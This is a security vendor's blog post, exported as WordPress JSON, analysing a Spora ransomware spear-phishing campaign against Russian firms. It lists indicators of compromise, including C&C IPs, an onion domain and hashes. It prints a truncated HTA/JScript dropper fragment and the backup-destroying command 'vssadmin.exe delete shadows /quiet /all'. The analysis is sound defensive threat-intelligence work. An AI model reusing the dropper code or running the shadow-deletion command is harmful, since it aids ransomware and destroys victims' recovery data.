{"id":2373,"date":"2024-09-25T17:44:53","date_gmt":"2024-09-25T17:44:53","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2373"},"modified":"2025-07-29T03:37:39","modified_gmt":"2025-07-29T03:37:39","slug":"spora-ransomware-returns-with-russia-in-its-sights","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/spora-ransomware-returns-with-russia-in-its-sights\/","title":{"rendered":"Spora ransomware returns with Russia in its sights"},"content":{"rendered":"
\n
\"\"<\/figure>\n<\/div>\n\n\n

LMNTRIX researchers are currently tracking a ransomware campaign slinging Spora \u2013 an incredibly sophisticated ransomware strain. The campaign is highly targeted against organisations operating in Russia. Those behind the campaign are using a Malaysian web hosting platform as their malware repository, whether it is a compromised account or the attackers have paid for the privilege is unclear.\u00a0

For background, \u00a0Spora ransomware was most active in the first quarter of 2017 and was able to fool static Antivirus signatures by using HTA (HTML application) embedded into a PDF (as reported by Sophos<\/a>). TTPs remain the same (although some earlier campaigns also had an English language variant which so far this campaign lacks) .\u00a0

Complete TTPs can be found further below:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\u00a0 \u00a0 \u00a0 \u00a0\u00a0
DELIVERY<\/strong>

The sample we analysed was received as part of a spear phishing campaign targeting the Russian employees of an automotive firm. The email was sent from a free Russian mail address \u201ctatjana.schwenk@mail.ru<\/strong> “. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n



The email is sent with a call to action IP address in the body of the email:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The sender wants the victim to download a file hosted on the secure server. The text of the email is in Russian Cyrillic. On further investigation, we found that the IP address (111[.]90[.]149[.]37) is registered with the Malaysian web hosting company, Shinjiru. The LMNTRIX team has contacted the hosting provider to take down the malware repository.\u00a0<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n


When the file is downloaded from the repository, it looks like this: \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n



The downloaded ZIP archive file is named:

\u00a0 \u041f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 18 \u0410\u0412\u0413 _ \u0421\u0420\u041e\u0427\u041d\u041e – \u041f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043e \u0433\u043b\u0430\u0432.\u0431\u0443\u0445\u043e\u043c.zip

\u00a0 \u00a0 SHA256: fae787a4a97bac95d49a00196fecaf2026f396b5fc83b7faef629b39e18b97fc

\u00a0 \u00a0 Threat Name: Trojan-Ransom.Win32.Spora.emy<\/em><\/strong>
<\/p>\n\n\n\n

INFECTION<\/strong>

The ZIP archive file contains a JavaScript file, embedded with malicious code, which acts as a dropper agent.

Filename: \u041f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 18 \u0410\u0412\u0413 _ \u0421\u0420\u041e\u0427\u041d\u041e – \u041f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043e \u0433\u043b\u0430\u0432.\u0431\u0443\u0445\u043e\u043c.js <\/strong>

SHA256:c78612d1d50b3cbe9709f173c42808858eeec2cf4e15cc8b0b7a4b6b373c9b77
<\/p>\n\n\n\n

<hta:application showInTaskbar=”no” innerBorder=”no” navigable=”no” scroll=”no” border=”none” caption=”none”><html><body><script language=’JScript’>t = new ActiveXObject(‘WScript.Shell’).ExpandEnvironmentStrings(‘%temp%’);f = new ActiveXObject(‘Scripting.FileSystemObject’);c = new ActiveXObject(‘ADODB.Stream’);if(!f.FileExists(t+’\\\\icon_2.png’)){b = new ActiveXObject(‘MSXML2.DOMDocument’).createElement(‘r’);b.text=’i<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

The HTML application code makes the script file invoke the shell code for communication with the C&C, which then drops the payload path file.\u00a0

The spawned process msHta.exe<\/strong> uses file path: “%APPDATA%\\Microsoft\\Windows\\StartMenu\\Programs\\Startup\\README_sTlLoTpq.hta\u201d<\/strong> \u00a0

Communication to the C&C domain is established by the HTA process:

5pr6hirtlfan3j76.onion\u00a0\u00a0 \u00a031.192.105.180\u00a0\u00a0 \u00a0–\u00a0\u00a0 \u00a0Russian Federation

31.192.105.180 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 OSINT\u00a0\u00a0 \u00a08123 \u00a0 \u00a0 \u00a0TCP\u00a0\u00a0 \u00a0mshta.exe (PID: 468)

The spawned process runs further shell commands to delete the shadow file of the infected system:

\u201c\/c vssadmin.exe delete shadows \/quiet \/all”<\/strong>

Along with access to \u201cMountPointManager\u201d <\/strong>to look for more infection locations, the following files are accessed on the infected machine:

<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n



ENCRYPTION<\/strong>

One unique feature of Spora is that it doesn\u2019t add any file extensions or rename\u00a0

the encrypted file.\u00a0

Upon execution on the victim\u2019s machine, a script error pops up and forces the\u00a0

user to accept the script execution option, as seen below:
<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n



The associated process can be seen executing the error here:
<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The following ransom message is then displayed on the machine:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n



COMMAND & CONTROL<\/strong>

From the domain (http:\/\/5pr6hirtlfan3j76.onion\/<\/strong>), the below strings could be extracted with TCP communications established for IP and port 31.192.105.180:8123<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n


INDICATORS OF COMPROMISE (IOC)<\/strong>

31.192.105.180

111.90.149.37

http:\/\/5pr6hirtlfan3j76.onion

%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\README_sTlLoTpq.hta

%TEMP%\\rad937F7.exe

Associated SHA256<\/strong>

c78612d1d50b3cbe9709f173c42808858eeec2cf4e15cc8b0b7a4b6b373c9b77\u00a0

fae787a4a97bac95d49a00196fecaf2026f396b5fc83b7faef629b39e18b97fc

CONCLUSION<\/strong>

This campaign is currently active and \u2013 for now at least \u2013 is targeting only Russian organisations. The first infection we witnessed was on August 18, with some threat intelligence feeds suggesting the campaign began a few days earlier on August 15.

\u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"

LMNTRIX researchers are currently tracking a ransomware campaign slinging Spora – an incredibly sophisticated ransomware strain. The campaign is highly targeted against organisations operating in Russia. Those behind the campaign are using a Malaysian web hosting platform as their malware repository, whether it is a compromised account or the attackers have paid for the privilege […]<\/p>\n","protected":false},"author":1,"featured_media":2375,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2373","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2373","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2373"}],"version-history":[{"count":3,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2373\/revisions"}],"predecessor-version":[{"id":3469,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2373\/revisions\/3469"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2375"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2373"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2373"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2373"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}